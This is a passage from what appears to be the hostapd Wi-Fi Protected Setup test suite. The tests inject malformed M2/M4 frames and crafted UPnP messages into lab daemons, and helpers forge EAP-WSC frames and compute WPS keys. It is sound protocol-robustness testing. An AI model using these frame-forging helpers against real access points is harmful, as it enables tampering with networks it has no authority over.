raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_enrollee_nonce(dev, apdev):
"""WPS and M2 without Enrollee Nonce"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[56:64] != '101a0010':
raise Exception("Could not find enrollee Nonce attribute")
# Remove Enrollee Nonce. This will fail Authenticator check, but
# allows the code path in wps_process_enrollee_nonce() to be checked from
# the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 20)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:56] + msg[96:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_uuid_r(dev, apdev):
"""WPS and M2 without UUID-R"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[136:144] != '10480010':
raise Exception("Could not find enrollee Nonce attribute")
# Remove UUID-R. This will fail Authenticator check, but allows the code
# path in wps_process_uuid_r() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 20)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:136] + msg[176:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_invalid(dev, apdev):
"""WPS and M2 parsing failure"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[136:144] != '10480010':
raise Exception("Could not find enrollee Nonce attribute")
# Remove UUID-R. This will fail Authenticator check, but allows the code
# path in wps_process_uuid_r() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 1)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:-2]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_msg_type(dev, apdev):
"""WPS and M2 without Message Type"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Remove Message Type. This will fail Authenticator check, but allows the
# code path in wps_process_wsc_msg() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 5)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:46] + msg[56:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_msg_type(dev, apdev):
"""WPS and M2 but unknown Message Type"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Replace Message Type value. This will be rejected.
msg = msg[0:54] + "00" + msg[56:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_opcode(dev, apdev):
"""WPS and M2 but unknown opcode"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
# Replace opcode. This will be discarded in EAP-WSC processing.
msg = msg[0:32] + "00" + msg[34:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_opcode2(dev, apdev):
"""WPS and M2 but unknown opcode (WSC_Start)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
# Replace opcode. This will be discarded in EAP-WSC processing.
msg = msg[0:32] + "01" + msg[34:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_opcode3(dev, apdev):
"""WPS and M2 but unknown opcode (WSC_Done)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
# Replace opcode. This will be discarded in WPS Enrollee processing.
msg = msg[0:32] + "05" + msg[34:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
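# Helper: run the exchange until the AP's real M2 is pending, replace its
# Message Type value with the given one, and verify that the STA rejects the
# modified message with a WPS-FAIL event.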
def wps_m2_but_other(dev, apdev, title, msgtype):
addr,bssid,hapd = wps_start_ext(apdev, dev)
wps_ext_eap_identity_req(dev, hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev, addr)
wps_ext_eap_wsc(dev, hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev, addr, "M1")
logger.debug(title)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev.request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Replace Message Type value. This will be rejected.
msg = msg[0:54] + msgtype + msg[56:]
res = dev.request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS-FAIL event not seen")
dev.request("WPS_CANCEL")
dev.wait_disconnected()
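# Same as wps_m2_but_other(), but the exchange is run up to M4 before the
# Message Type value is replaced.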
def wps_m4_but_other(dev, apdev, title, msgtype):
addr,bssid,hapd = wps_start_ext(apdev, dev)
wps_ext_eap_identity_req(dev, hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev, addr)
wps_ext_eap_wsc(dev, hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev, addr, "M1")
wps_ext_eap_wsc(dev, hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev, addr, "M3")
logger.debug(title)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev.request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Replace Message Type value. This will be rejected.
msg = msg[0:54] + msgtype + msg[56:]
res = dev.request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS-FAIL event not seen")
dev.request("WPS_CANCEL")
dev.wait_disconnected()
def test_ap_wps_m2_msg_type_m4(dev, apdev):
"""WPS and M2 but Message Type M4"""
wps_m2_but_other(dev[0], apdev[0], "M2/M4", "08")
def test_ap_wps_m2_msg_type_m6(dev, apdev):
"""WPS and M2 but Message Type M6"""
wps_m2_but_other(dev[0], apdev[0], "M2/M6", "0a")
def test_ap_wps_m2_msg_type_m8(dev, apdev):
"""WPS and M2 but Message Type M8"""
wps_m2_but_other(dev[0], apdev[0], "M2/M8", "0c")
def test_ap_wps_m4_msg_type_m2(dev, apdev):
"""WPS and M4 but Message Type M2"""
wps_m4_but_other(dev[0], apdev[0], "M4/M2", "05")
def test_ap_wps_m4_msg_type_m2d(dev, apdev):
"""WPS and M4 but Message Type M2D"""
wps_m4_but_other(dev[0], apdev[0], "M4/M2D", "06")
@remote_compatible
def test_ap_wps_config_methods(dev, apdev):
"""WPS configuration method parsing"""
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"config_methods": "ethernet display ext_nfc_token int_nfc_token physical_display physical_push_button" }
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"config_methods": "display push_button" }
hapd2 = hostapd.add_ap(apdev[1], params)
def test_ap_wps_set_selected_registrar_proto(dev, apdev):
"""WPS UPnP SetSelectedRegistrar protocol testing"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
ctrlurl = urlparse(urls['control_url'])
url = urlparse(location)
conn = HTTPConnection(url.netloc)
class WPSERHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip()
logger.debug(data)
self.wfile.write(gen_wps_event())
server = MyTCPServer(("127.0.0.1", 12345), WPSERHTTPServer)
server.timeout = 1
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
server.handle_request()
tests = [ (500, "10"),
(200, "104a000110" + "1041000101" + "101200020000" +
"105300023148" +
"1049002c00372a0001200124111111111111222222222222333333333333444444444444555555555555666666666666" +
"10480010362db47ba53a519188fb5458b986b2e4"),
(200, "104a000110" + "1041000100" + "101200020000" +
"105300020000"),
(200, "104a000110" + "1041000100"),
(200, "104a000110") ]
for status,test in tests:
tlvs = binascii.unhexlify(test)
newmsg = base64.b64encode(tlvs).decode()
msg = '<?xml version="1.0"?>\n'
msg += '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
msg += '<s:Body>'
msg += '<u:SetSelectedRegistrar xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">'
msg += '<NewMessage>'
msg += newmsg
msg += "</NewMessage></u:SetSelectedRegistrar></s:Body></s:Envelope>"
headers = { "Content-type": 'text/xml; charset="utf-8"' }
headers["SOAPAction"] = '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#%s"' % "SetSelectedRegistrar"
conn.request("POST", ctrlurl.path, msg, headers)
resp = conn.getresponse()
if resp.status != status:
raise Exception("Unexpected HTTP response: %d (expected %d)" % (resp.status, status))
def test_ap_wps_adv_oom(dev, apdev):
"""WPS AP and advertisement OOM"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
with alloc_fail(hapd, 1, "=msearchreply_state_machine_start"):
ssdp_send_msearch("urn:schemas-wifialliance-org:service:WFAWLANConfig:1",
no_recv=True)
time.sleep(0.2)
with alloc_fail(hapd, 1, "eloop_register_timeout;msearchreply_state_machine_start"):
ssdp_send_msearch("urn:schemas-wifialliance-org:service:WFAWLANConfig:1",
no_recv=True)
time.sleep(0.2)
with alloc_fail(hapd, 1,
"next_advertisement;advertisement_state_machine_stop"):
hapd.disable()
with alloc_fail(hapd, 1, "ssdp_listener_start"):
if "FAIL" not in hapd.request("ENABLE"):
raise Exception("ENABLE succeeded during OOM")
def test_wps_config_methods(dev):
"""WPS config method update"""
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
if "OK" not in wpas.request("SET config_methods display label"):
raise Exception("Failed to set config_methods")
if wpas.request("GET config_methods").strip() != "display label":
raise Exception("config_methods were not updated")
if "OK" not in wpas.request("SET config_methods "):
raise Exception("Failed to clear config_methods")
if wpas.request("GET config_methods").strip() != "":
raise Exception("config_methods were not cleared")
WPS_VENDOR_ID_WFA = 14122
WPS_VENDOR_TYPE = 1
# EAP-WSC Op-Code values
WSC_Start = 0x01
WSC_ACK = 0x02
WSC_NACK = 0x03
WSC_MSG = 0x04
WSC_Done = 0x05
WSC_FRAG_ACK = 0x06
ATTR_AP_CHANNEL = 0x1001
ATTR_ASSOC_STATE = 0x1002
ATTR_AUTH_TYPE = 0x1003
ATTR_AUTH_TYPE_FLAGS = 0x1004
ATTR_AUTHENTICATOR = 0x1005
ATTR_CONFIG_METHODS = 0x1008
ATTR_CONFIG_ERROR = 0x1009
ATTR_CONFIRM_URL4 = 0x100a
ATTR_CONFIRM_URL6 = 0x100b
ATTR_CONN_TYPE = 0x100c
ATTR_CONN_TYPE_FLAGS = 0x100d
ATTR_CRED = 0x100e
ATTR_ENCR_TYPE = 0x100f
ATTR_ENCR_TYPE_FLAGS = 0x1010
ATTR_DEV_NAME = 0x1011
ATTR_DEV_PASSWORD_ID = 0x1012
ATTR_E_HASH1 = 0x1014
ATTR_E_HASH2 = 0x1015
ATTR_E_SNONCE1 = 0x1016
ATTR_E_SNONCE2 = 0x1017
ATTR_ENCR_SETTINGS = 0x1018
ATTR_ENROLLEE_NONCE = 0x101a
ATTR_FEATURE_ID = 0x101b
ATTR_IDENTITY = 0x101c
ATTR_IDENTITY_PROOF = 0x101d
ATTR_KEY_WRAP_AUTH = 0x101e
ATTR_KEY_ID = 0x101f
ATTR_MAC_ADDR = 0x1020
ATTR_MANUFACTURER = 0x1021
ATTR_MSG_TYPE = 0x1022
ATTR_MODEL_NAME = 0x1023
ATTR_MODEL_NUMBER = 0x1024
ATTR_NETWORK_INDEX = 0x1026
ATTR_NETWORK_KEY = 0x1027
ATTR_NETWORK_KEY_INDEX = 0x1028
ATTR_NEW_DEVICE_NAME = 0x1029
ATTR_NEW_PASSWORD = 0x102a
ATTR_OOB_DEVICE_PASSWORD = 0x102c
ATTR_OS_VERSION = 0x102d
ATTR_POWER_LEVEL = 0x102f
ATTR_PSK_CURRENT = 0x1030
ATTR_PSK_MAX = 0x1031
ATTR_PUBLIC_KEY = 0x1032
ATTR_RADIO_ENABLE = 0x1033
ATTR_REBOOT = 0x1034
ATTR_REGISTRAR_CURRENT = 0x1035
ATTR_REGISTRAR_ESTABLISHED = 0x1036
ATTR_REGISTRAR_LIST = 0x1037
ATTR_REGISTRAR_MAX = 0x1038
ATTR_REGISTRAR_NONCE = 0x1039
ATTR_REQUEST_TYPE = 0x103a
ATTR_RESPONSE_TYPE = 0x103b
ATTR_RF_BANDS = 0x103c
ATTR_R_HASH1 = 0x103d
ATTR_R_HASH2 = 0x103e
ATTR_R_SNONCE1 = 0x103f
ATTR_R_SNONCE2 = 0x1040
ATTR_SELECTED_REGISTRAR = 0x1041
ATTR_SERIAL_NUMBER = 0x1042
ATTR_WPS_STATE = 0x1044
ATTR_SSID = 0x1045
ATTR_TOTAL_NETWORKS = 0x1046
ATTR_UUID_E = 0x1047
ATTR_UUID_R = 0x1048
ATTR_VENDOR_EXT = 0x1049
ATTR_VERSION = 0x104a
ATTR_X509_CERT_REQ = 0x104b
ATTR_X509_CERT = 0x104c
ATTR_EAP_IDENTITY = 0x104d
ATTR_MSG_COUNTER = 0x104e
ATTR_PUBKEY_HASH = 0x104f
ATTR_REKEY_KEY = 0x1050
ATTR_KEY_LIFETIME = 0x1051
ATTR_PERMITTED_CFG_METHODS = 0x1052
ATTR_SELECTED_REGISTRAR_CONFIG_METHODS = 0x1053
ATTR_PRIMARY_DEV_TYPE = 0x1054
ATTR_SECONDARY_DEV_TYPE_LIST = 0x1055
ATTR_PORTABLE_DEV = 0x1056
ATTR_AP_SETUP_LOCKED = 0x1057
ATTR_APPLICATION_EXT = 0x1058
ATTR_EAP_TYPE = 0x1059
ATTR_IV = 0x1060
ATTR_KEY_PROVIDED_AUTO = 0x1061
ATTR_802_1X_ENABLED = 0x1062
ATTR_APPSESSIONKEY = 0x1063
ATTR_WEPTRANSMITKEY = 0x1064
ATTR_REQUESTED_DEV_TYPE = 0x106a
# Message Type
WPS_Beacon = 0x01
WPS_ProbeRequest = 0x02
WPS_ProbeResponse = 0x03
WPS_M1 = 0x04
WPS_M2 = 0x05
WPS_M2D = 0x06
WPS_M3 = 0x07
WPS_M4 = 0x08
WPS_M5 = 0x09
WPS_M6 = 0x0a
WPS_M7 = 0x0b
WPS_M8 = 0x0c
WPS_WSC_ACK = 0x0d
WPS_WSC_NACK = 0x0e
WPS_WSC_DONE = 0x0f
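# Parse an EAPOL-TX event hexdump into its EAPOL, EAP, EAP expanded, and
# EAP-WSC headers plus a dictionary of the included WSC attributes.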
def get_wsc_msg(dev):
ev = dev.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
data = binascii.unhexlify(ev.split(' ')[2])
msg = {}
# Parse EAPOL header
if len(data) < 4:
raise Exception("No room for EAPOL header")
version,type,length = struct.unpack('>BBH', data[0:4])
msg['eapol_version'] = version
msg['eapol_type'] = type
msg['eapol_length'] = length
data = data[4:]
if length != len(data):
raise Exception("EAPOL header length mismatch (%d != %d)" % (length, len(data)))
if type != 0:
raise Exception("Unexpected EAPOL header type: %d" % type)
# Parse EAP header
if len(data) < 4:
raise Exception("No room for EAP header")
code,identifier,length = struct.unpack('>BBH', data[0:4])
msg['eap_code'] = code
msg['eap_identifier'] = identifier
msg['eap_length'] = length
data = data[4:]
if msg['eapol_length'] != msg['eap_length']:
raise Exception("EAP header length mismatch (%d != %d)" % (msg['eapol_length'], length))
# Parse EAP expanded header
if len(data) < 1:
raise Exception("No EAP type included")
msg['eap_type'], = struct.unpack('B', data[0:1])
data = data[1:]
if msg['eap_type'] == 254:
if len(data) < 3 + 4:
raise Exception("Truncated EAP expanded header")
msg['eap_vendor_id'], msg['eap_vendor_type'] = struct.unpack('>LL', b'\x00' + data[0:7])
data = data[7:]
else:
raise Exception("Unexpected EAP type")
if msg['eap_vendor_id'] != WPS_VENDOR_ID_WFA:
raise Exception("Unexpected Vendor-Id")
if msg['eap_vendor_type'] != WPS_VENDOR_TYPE:
raise Exception("Unexpected Vendor-Type")
# Parse EAP-WSC header
if len(data) < 2:
raise Exception("Truncated EAP-WSC header")
msg['wsc_opcode'], msg['wsc_flags'] = struct.unpack('BB', data[0:2])
data = data[2:]
# Parse WSC attributes
msg['raw_attrs'] = data
attrs = {}
while len(data) > 0:
if len(data) < 4:
raise Exception("Truncated attribute header")
attr,length = struct.unpack('>HH', data[0:4])
data = data[4:]
if length > len(data):
raise Exception("Truncated attribute 0x%04x" % attr)
attrs[attr] = data[0:length]
data = data[length:]
msg['wsc_attrs'] = attrs
if ATTR_MSG_TYPE in attrs:
msg['wsc_msg_type'], = struct.unpack('B', attrs[ATTR_MSG_TYPE])
return msg
def recv_wsc_msg(dev, opcode, msg_type):
msg = get_wsc_msg(dev)
if msg['wsc_opcode'] != opcode or msg['wsc_msg_type'] != msg_type:
raise Exception("Unexpected Op-Code/MsgType")
return msg, msg['wsc_attrs'], msg['raw_attrs']
def build_wsc_attr(attr, payload):
    _payload = payload if isinstance(payload, bytes) else payload.encode()
return struct.pack('>HH', attr, len(_payload)) + _payload
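# WSC attributes are simple TLVs: 16-bit type, 16-bit length, then the value.
# For example, build_wsc_attr(ATTR_MSG_TYPE, b'\x05') returns
# b'\x10\x22\x00\x01\x05' (Message Type = M2).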
def build_attr_msg_type(msg_type):
return build_wsc_attr(ATTR_MSG_TYPE, struct.pack('B', msg_type))
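# Frame WSC attributes for transmission: EAPOL header (version 2, type 0 =
# EAP-Packet), EAP header, EAP expanded header (type 254 with the 3-octet WFA
# Vendor-Id and 4-octet Vendor-Type), and the 2-octet EAP-WSC header
# (Op-Code, Flags).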
def build_eap_wsc(eap_code, eap_id, payload, opcode=WSC_MSG):
length = 4 + 8 + 2 + len(payload)
# EAPOL header
msg = struct.pack('>BBH', 2, 0, length)
# EAP header
msg += struct.pack('>BBH', eap_code, eap_id, length)
# EAP expanded header for EAP-WSC
msg += struct.pack('B', 254)
msg += struct.pack('>L', WPS_VENDOR_ID_WFA)[1:4]
msg += struct.pack('>L', WPS_VENDOR_TYPE)
# EAP-WSC header
msg += struct.pack('BB', opcode, 0)
# WSC attributes
msg += payload
return msg
def build_eap_success(eap_id):
length = 4
# EAPOL header
msg = struct.pack('>BBH', 2, 0, length)
# EAP header
msg += struct.pack('>BBH', 3, eap_id, length)
return msg
def build_eap_failure(eap_id):
length = 4
# EAPOL header
msg = struct.pack('>BBH', 2, 0, length)
# EAP header
msg += struct.pack('>BBH', 4, eap_id, length)
return msg
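# Inject a locally built frame into the peer's EAPOL processing through the
# EAPOL_RX control interface command.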
def send_wsc_msg(dev, src, msg):
res = dev.request("EAPOL_RX " + src + " " + binascii.hexlify(msg).decode())
if "OK" not in res:
raise Exception("EAPOL_RX failed")
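# 1536-bit MODP group (RFC 3526 group 5) used for the WPS Diffie-Hellman
# exchange.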
group_5_prime = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF
group_5_generator = 2
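# Counter-mode key derivation function from the WPS specification: iterate
# HMAC-SHA256 over (counter || personalization label || total bits) until
# enough output has been produced.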
def wsc_kdf(key, label, bits):
result = b''
i = 1
while len(result) * 8 < bits:
data = struct.pack('>L', i) + label.encode() + struct.pack('>L', bits)
m = hmac.new(key, data, hashlib.sha256)
result += m.digest()
i += 1
return result[0:bits // 8]
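# Derive AuthKey (256 bits), KeyWrapKey (128 bits), and EMSK (256 bits) from
# the KDK, per the WPS specification.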
def wsc_keys(kdk):
keys = wsc_kdf(kdk, "Wi-Fi Easy and Secure Key Derivation", 640)
authkey = keys[0:32]
keywrapkey = keys[32:48]
emsk = keys[48:80]
return authkey,keywrapkey,emsk
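# PSK1 and PSK2 are the first 128 bits of HMAC-SHA256(AuthKey, half of the
# device password); wsc_dev_pw_psk() splits the password and derives both.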
def wsc_dev_pw_half_psk(authkey, dev_pw):
m = hmac.new(authkey, dev_pw.encode(), hashlib.sha256)
return m.digest()[0:16]
def wsc_dev_pw_psk(authkey, dev_pw):
dev_pw_1 = dev_pw[0:len(dev_pw) // 2]
dev_pw_2 = dev_pw[len(dev_pw) // 2:]
psk1 = wsc_dev_pw_half_psk(authkey, dev_pw_1)
psk2 = wsc_dev_pw_half_psk(authkey, dev_pw_2)
return psk1,psk2
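# Authenticator attribute: first 64 bits of HMAC-SHA256(AuthKey, previous
# message || current message without the Authenticator attribute itself).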
def build_attr_authenticator(authkey, prev_msg, curr_msg):
m = hmac.new(authkey, prev_msg + curr_msg, hashlib.sha256)
auth = m.digest()[0:8]
return build_wsc_attr(ATTR_AUTHENTICATOR, auth)
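# Encrypted Settings: append a Key Wrap Authenticator (first 64 bits of
# HMAC-SHA256(AuthKey, plaintext)), pad to the AES block size with PKCS#7
# style padding, and encrypt with AES-128-CBC. The IV is prepended to the
# ciphertext; a fixed IV is used here to keep the tests reproducible.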
def build_attr_encr_settings(authkey, keywrapkey, data):
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
return build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
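# Inverse of build_attr_encr_settings(): decrypt, validate the padding, and
# verify the Key Wrap Authenticator before returning the plaintext
# attributes.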
def decrypt_attr_encr_settings(authkey, keywrapkey, data):
if len(data) < 32 or len(data) % 16 != 0:
raise Exception("Unexpected Encrypted Settings length: %d" % len(data))
iv = data[0:16]
encr = data[16:]
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
decrypted = aes.decrypt(encr)
pad_len, = struct.unpack('B', decrypted[-1:])
if pad_len > len(decrypted):
raise Exception("Invalid padding in Encrypted Settings")
for i in range(-pad_len, -1):
if decrypted[i] != decrypted[-1]:
raise Exception("Invalid PS value in Encrypted Settings")
decrypted = decrypted[0:len(decrypted) - pad_len]
if len(decrypted) < 12:
raise Exception("Truncated Encrypted Settings plaintext")
kwa = decrypted[-12:]
attr,length = struct.unpack(">HH", kwa[0:4])
if attr != ATTR_KEY_WRAP_AUTH or length != 8:
raise Exception("Invalid KWA header")
kwa = kwa[4:]
